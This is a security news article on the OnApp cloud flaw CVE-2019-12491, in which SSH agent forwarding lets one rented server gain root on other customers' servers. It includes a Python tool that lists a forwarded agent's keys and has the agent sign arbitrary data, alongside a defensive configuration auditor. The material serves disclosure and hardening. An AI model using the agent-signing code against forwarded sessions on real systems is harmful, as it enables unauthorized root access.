Dark Reading is part of the Informa Tech Division of Informa PLC

Cloud

9/27/2019 03:15 PM

Cloud Vulnerability Could Let One Server Compromise Thousands

A flaw in the OnApp cloud management platform could let an attacker compromise a private cloud with access to a single server.

A newly disclosed critical vulnerability in the OnApp cloud orchestration platform could let an attacker who has access to a single server compromise an entire private cloud, researchers report.

The finding comes from researchers at security firm Skylight Cyber, who say the flaw could affect hundreds of thousands of production servers at organizations around the world. OnApp, based in London, makes one of the leading cloud management platforms and powers thousands of clouds for managed service providers, telcos, and other cloud hosting services.

Cloud security issues are common these days, but we usually see them in the context of customer misconfigurations and the accidental data leaks that follow; in most cases those mishaps are the user's fault. This flaw sits in a management system that thousands of providers use, and it could let an attacker access, steal, alter, or destroy data on a server through no fault of the user or the provider.

The way OnApp manages the servers in a cloud environment could let an attacker achieve remote code execution (RCE) with root privileges on other customers' servers. The attacker need only rent a server, a simple process that at many providers requires nothing more than an email address.

With that one server, an attacker could compromise the entire private cloud, researchers explain in a technical blog post. Any user can trigger an SSH connection from the OnApp control panel to their own server, and because OnApp opens those connections with SSH "agent forwarding," the attacker's server can relay authentication requests back to the control panel's agent and use its key to log in to any other server in the same cloud.

The vulnerability affects all OnApp control panels managing Xen or KVM compute resources, OnApp says in a security advisory. It does not affect control panels that manage only VMware vCloud Director or VMware vCenter environments, or CDN-only control panels. OnApp has issued a patch and says there is no feasible workaround.

The researchers tested, confirmed, and replicated their methodology across multiple cloud vendors running OnApp with Xen and KVM hypervisors. In fact, it worked for them on the first try.

How They Found It
Skylight began investigating in May, when it was alerted to hate messages targeting the campaign of an Australian federal parliament member who was running for office. The emails were disguised to look as though they came from many Australian businesses, but they all originated from a single source.

Analysis of the emails led to several servers used to send them. The attacker seems to have preferred a single hosting company, probably because it required neither payment nor ID to start a free 24-hour trial. The researchers decided to retrace the attacker's steps to see whether any incriminating evidence had been left behind. Finding none, they hypothesized that the platform itself might have a bug.

The researchers explored the hosting company's control panel and saw that the cloud provider opened an SSH connection to their server. A public key had been pre-installed on the server for that access, which prompted the team to wonder whether the management software used the same key pair to manage every server. It did, and the researchers found they could open an SSH connection to any other server at the hosting company, with the same root access the provider had, even though they never possessed the private key.

Agent forwarding made this possible. This SSH feature lets you connect to a remote machine and give that machine the ability to SSH onward to other machines, without the remote machine ever holding the private authentication key or the passphrase that protects it, the researchers explain.

The benefit is that the private key can stay on one machine, the one running the SSH agent, rather than being copied onto every server that needs to authenticate onward. With agent forwarding, that machine lets a remote server use the key without ever exposing it: when the remote server connects on to a target, the target's "key challenge" is relayed back through the remote server to the local agent, which answers it.
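To make that relay concrete, here is an added example (my own code, not Skylight's or OnApp's) of what a host that receives a forwarded agent can do with it. It speaks the SSH agent protocol directly over the forwarded SSH_AUTH_SOCK socket: it lists the keys the remote agent holds and asks the agent to sign data, which is all a login to a third server requires. The key blob and comment in SAMPLE_ANSWER are constructed, not captured from OnApp; only `probe_forwarded_agent` touches a real socket, and it returns nothing when none is present.

```python
"""What a forwarded SSH agent hands to a hostile remote host.

With agent forwarding the remote host receives a UNIX socket (SSH_AUTH_SOCK)
proxied back to the agent on the connecting machine. Anyone who can open it
(root on the remote host always can) may list the agent's keys and have it sign
arbitrary data, which is all SSH user authentication needs, without ever seeing
a private key. Framing per the SSH agent protocol (draft-miller-ssh-agent):
uint32 length, one-byte type, then uint32-length-prefixed strings.
"""
import os
import socket
import struct

SSH_AGENTC_REQUEST_IDENTITIES = 11
SSH_AGENT_IDENTITIES_ANSWER = 12
SSH_AGENTC_SIGN_REQUEST = 13
SSH_AGENT_SIGN_RESPONSE = 14

def _string(data: bytes) -> bytes:
    """Encode an SSH protocol string: uint32 length followed by the bytes."""
    return struct.pack(">I", len(data)) + data

def _read_string(buf: bytes, off: int):
    """Decode an SSH protocol string at `off`; returns (bytes, next offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def frame(body: bytes) -> bytes:
    """Prefix a message body with the agent-protocol length field."""
    return struct.pack(">I", len(body)) + body

REQUEST_IDENTITIES = frame(bytes([SSH_AGENTC_REQUEST_IDENTITIES]))

def sign_request(key_blob: bytes, data: bytes, flags: int = 0) -> bytes:
    """Ask the agent to sign `data` with the key whose public blob is `key_blob`.
    In a relayed login `data` is the challenge some other server issued; the
    agent cannot distinguish that from a legitimate hop."""
    body = (bytes([SSH_AGENTC_SIGN_REQUEST]) + _string(key_blob)
            + _string(data) + struct.pack(">I", flags))
    return frame(body)

def parse_identities(msg: bytes):
    """Parse a framed SSH_AGENT_IDENTITIES_ANSWER into [(key_type, comment, blob)]."""
    (n,) = struct.unpack(">I", msg[:4])
    body = msg[4:4 + n]
    if not body or body[0] != SSH_AGENT_IDENTITIES_ANSWER:
        raise ValueError("unexpected agent message type %r" % body[:1])
    (count,) = struct.unpack(">I", body[1:5])
    off, keys = 5, []
    for _ in range(count):
        blob, off = _read_string(body, off)
        comment, off = _read_string(body, off)
        key_type, _ = _read_string(blob, 0)  # a public key blob starts with its type
        keys.append((key_type.decode(), comment.decode("utf-8", "replace"), blob))
    return keys

def parse_signature(msg: bytes):
    """Parse a framed SSH_AGENT_SIGN_RESPONSE into (algorithm, raw signature).
    Raises ValueError on SSH_AGENT_FAILURE (type 5), e.g. a declined `ssh-add -c` prompt."""
    (n,) = struct.unpack(">I", msg[:4])
    body = msg[4:4 + n]
    if not body or body[0] != SSH_AGENT_SIGN_RESPONSE:
        raise ValueError("agent refused to sign (type %r)" % body[:1])
    sig_blob, _ = _read_string(body, 1)
    alg, off = _read_string(sig_blob, 0)
    sig, _ = _read_string(sig_blob, off)
    return alg.decode(), sig

def _exchange(sock, msg: bytes) -> bytes:
    """Send one framed message and read back exactly one framed reply."""
    sock.sendall(msg)
    buf = b""
    while len(buf) < 4 or len(buf) < 4 + struct.unpack(">I", buf[:4])[0]:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("agent closed the socket")
        buf += chunk
    return buf

def probe_forwarded_agent(sock_path=None):
    """Live check from inside a session: every key reachable through SSH_AUTH_SOCK
    and whether the agent signs for us with it. [] means no socket, nothing at risk."""
    path = sock_path or os.environ.get("SSH_AUTH_SOCK")
    if not path or not os.path.exists(path):
        return []
    rows = []
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect(path)
        for key_type, comment, blob in parse_identities(_exchange(s, REQUEST_IDENTITIES)):
            try:
                alg, sig = parse_signature(_exchange(s, sign_request(blob, b"probe")))
                rows.append((key_type, comment, alg, len(sig)))
            except ValueError:
                rows.append((key_type, comment, None, 0))  # key needs confirmation or was refused
    return rows

# Constructed sample, not captured from a real agent: the single management key an
# orchestrator's agent would present to every host it manages.
SAMPLE_KEY_BLOB = _string(b"ssh-ed25519") + _string(b"\x11" * 32)
SAMPLE_ANSWER = frame(bytes([SSH_AGENT_IDENTITIES_ANSWER]) + struct.pack(">I", 1)
                      + _string(SAMPLE_KEY_BLOB) + _string(b"orchestrator management key"))
```

Run `probe_forwarded_agent()` from a shell you landed in over SSH: an empty list means the client did not forward its agent; any row with a signature algorithm means the agent on the far end will authenticate you to anything that key unlocks. Keys loaded with `ssh-add -c` make the agent prompt its owner before signing, which is why the probe treats a refusal as a separate outcome.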

The researchers call agent forwarding "an extremely dangerous feature." With it enabled, any remote server that accepts your SSH connection can, for as long as the session lasts, authenticate as you to any server that accepts your key. The team got the management software to SSH to their server and run commands, then substituted their own code by replacing one of the binaries the software routinely executes on the managed host. OnApp's use of agent forwarding on that SSH connection gave the researchers a complete chain to compromise every server at a hosting company with root privileges.

To test it, the researchers set up a source server, which an attacker could obtain through a free trial, and a target server. On the source server they overwrote the "tput" binary with their own script, which used the forwarded agent to SSH to the target server and drop a flag file. They then triggered the management software and watched the flag file appear on the target server.
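For operators running any SSH-based orchestrator, the setting that matters is on the connecting side: the control panel must not offer its agent to hosts that tenants control. The following added example (my own code, not OnApp's configuration or software) audits OpenSSH client and server configuration for the weak setting beside the corrected one. The sample config texts are constructed, the Host-block matching follows ssh_config(5) semantics, and the treatment of Match blocks is a simplification stated in the code.

```python
"""Audit OpenSSH configuration for agent-forwarding exposure.

ssh_config (the connecting side, e.g. an orchestrator's control panel):
ForwardAgent defaults to "no"; any other value ("yes", or a socket path in
OpenSSH 8.1+) hands the agent to every host the enclosing block covers, and
ssh(1) uses the FIRST value obtained for a host, so block order matters.
sshd_config (a managed host): AllowAgentForwarding defaults to "yes"; "no"
stops that sshd from exposing a forwarded socket. The sshd check is only
defence in depth here: a tenant who is root on a rented server can run any
sshd they like, so the real fix is on the connecting side.
"""
import fnmatch
import re

_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9]*)\s*=?\s*(.*)$")

def parse_ssh_config(text):
    """Yield (block, keyword, value); block is ('host'|'match', pattern) or None
    for global lines. Keywords are case-insensitive; '#' starts a comment."""
    block = None
    for raw in text.splitlines():
        m = _LINE.match(raw.split("#", 1)[0].strip())
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip()
        if key in ("host", "match"):
            block = (key, val)
            continue
        yield block, key, val

def host_block_matches(patterns, hostname):
    """ssh_config Host semantics: a matching negated pattern (!foo) excludes the
    host outright; otherwise any one positive pattern matching is enough."""
    matched = False
    for pat in patterns.split():
        if pat.startswith("!"):
            if fnmatch.fnmatchcase(hostname, pat[1:]):
                return False
        elif fnmatch.fnmatchcase(hostname, pat):
            matched = True
    return matched

def client_forwards_agent(ssh_config, hostname):
    """Effective ForwardAgent for `hostname` from global and Host blocks.
    Match blocks are skipped here (their conditions need live connection
    state); audit() lists them for manual review instead."""
    for block, key, val in parse_ssh_config(ssh_config):
        if key != "forwardagent" or (block and block[0] == "match"):
            continue
        if block is None or host_block_matches(block[1], hostname):
            return val.lower() != "no"
    return False  # OpenSSH default

def server_allows_agent_forwarding(sshd_config):
    """Effective global AllowAgentForwarding for sshd(8); first value wins,
    default yes. Match blocks can still override it per connection."""
    for block, key, val in parse_ssh_config(sshd_config):
        if key == "allowagentforwarding" and block is None:
            return val.lower() != "no"
    return True

def audit(ssh_config, managed_hosts, sshd_config=""):
    """Return findings as strings; an empty list means nothing to fix."""
    findings = []
    for host in managed_hosts:
        if client_forwards_agent(ssh_config, host):
            findings.append("ssh_config forwards the agent to %s: set 'ForwardAgent no'" % host)
    for block, key, val in parse_ssh_config(ssh_config):
        if key == "forwardagent" and block and block[0] == "match" and val.lower() != "no":
            findings.append("ssh_config Match block '%s' enables ForwardAgent: review" % block[1])
    if sshd_config and server_allows_agent_forwarding(sshd_config):
        findings.append("sshd_config leaves AllowAgentForwarding at its default (yes)")
    return findings

# Constructed samples (not OnApp's shipped configuration).
WEAK_SSH_CONFIG = """\
# orchestrator that hands its agent to every host it manages
Host *
    User root
    ForwardAgent yes
"""
HARDENED_SSH_CONFIG = """\
# nothing forwarded; reach hosts behind a bastion with ProxyJump instead
Host *
    User root
    ForwardAgent no
"""
ORDERED_SSH_CONFIG = """\
# first match wins: vm-* hosts get 'no'; the excluded admin box falls through to 'yes'
Host vm-* !vm-admin.example
    ForwardAgent no
Host *
    ForwardAgent yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSH_CONFIG), ("hardened", HARDENED_SSH_CONFIG)):
        print(name, audit(cfg, ["vm-1.example", "vm-admin.example"]) or ["clean"])
```

Feed `audit()` the real files (`open("/etc/ssh/ssh_config").read()` plus the per-user config the orchestrator's service account uses) and the list of tenant hosts. Where an intermediate hop is genuinely needed, `ProxyJump` tunnels the second connection through the first without ever giving the bastion the agent, and keys loaded with `ssh-add -c` at least force a confirmation for every signature.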

"If we could replicate this across other companies, then the impact is much greater and more dangerous," according to Skylight Cyber. "All we have to do is find cloud providers using OnApp, rent a couple of servers, and test our thesis again."

The vulnerability has been assigned CVE-2019-12491.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ...

Comments
LeonorCastro, User Rank: Apprentice, 10/1/2019 3:18:20 AM
Re: OnApp reached out to me a few months ago
Good share!
tdsan, User Rank: Ninja, 9/30/2019 1:46:10 PM
OnApp reached out to me a few months ago

The researchers explored the control panel of the hosting company and saw there was an SSH connection between their server and the cloud provider. A public key had been pre-installed to access the server, prompting the team to wonder whether the management software was using the same key pair to manage every server. Researchers found this was the case, and they could launch an SSH connection to any server with the hosting company. They could do this even if they didn't have the private key, which granted the same level of root access the provider had.

It is interesting that you bring this up, because we had tested their solution out, but they did not allow us to test the internet connectivity of their cloud solution. Whew, I am glad that we did not decide to go with it, due to the testing limitations they put on their product. Well, this is good to know, and one thing: the price of the product was way outside of the major cloud providers or CSPs (Cloud Service Providers).


Anyway, thank you for the insight.

Tod